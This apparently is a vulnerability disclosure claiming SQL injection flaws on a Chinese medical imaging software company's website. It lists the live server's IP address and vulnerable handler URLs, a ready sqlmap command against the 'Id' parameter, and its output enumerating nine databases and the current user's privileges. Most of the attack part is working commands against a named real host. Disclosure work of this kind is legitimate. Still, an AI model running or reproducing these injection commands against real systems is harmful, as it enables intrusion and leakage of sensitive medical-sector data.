Multiple SQL injection vulnerabilities on ruiming medical master site cause Sensitive Information Leakage
RT
Chengdu ruiming Medical Information Technology Co., Ltd. is a high-tech enterprise dedicated to researching, developing, producing and selling PACS/RIS/HIS medical imaging information system products in the medical information field. The company's main R & D personnel have profound medical imaging research background, strong technical accumulation, early in the medical imaging processing, 3D reconstruction, breast CAD, pulmonary nodules detection, other computer-aided diagnosis and other major technical reserves are ......
http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134
python sqlmap.py -u "http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134" -p Id --dbsavailable databases [9]:[*] master[*] model[*] msdb[*] newMedicinePlatform[*] ReportServer[*] ReportServerTempDB[*] RMFitness[*] RmmitData[*] tempdb
[19:53:53] [INFO] fetching current databasecurrent database: 'RmmitData'[19:53:53] [INFO] testing if current user is DBAcurrent user is DBA: False[19:53:53] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2 times[19:53:53] [INFO] fetched data logged to text files under '/Users/Apple/.sqlmap/output/123.56.113.223'
http://123.56.113.223:8081/Handler/Paging.ashx?pageIndex=1&type=Working&d=73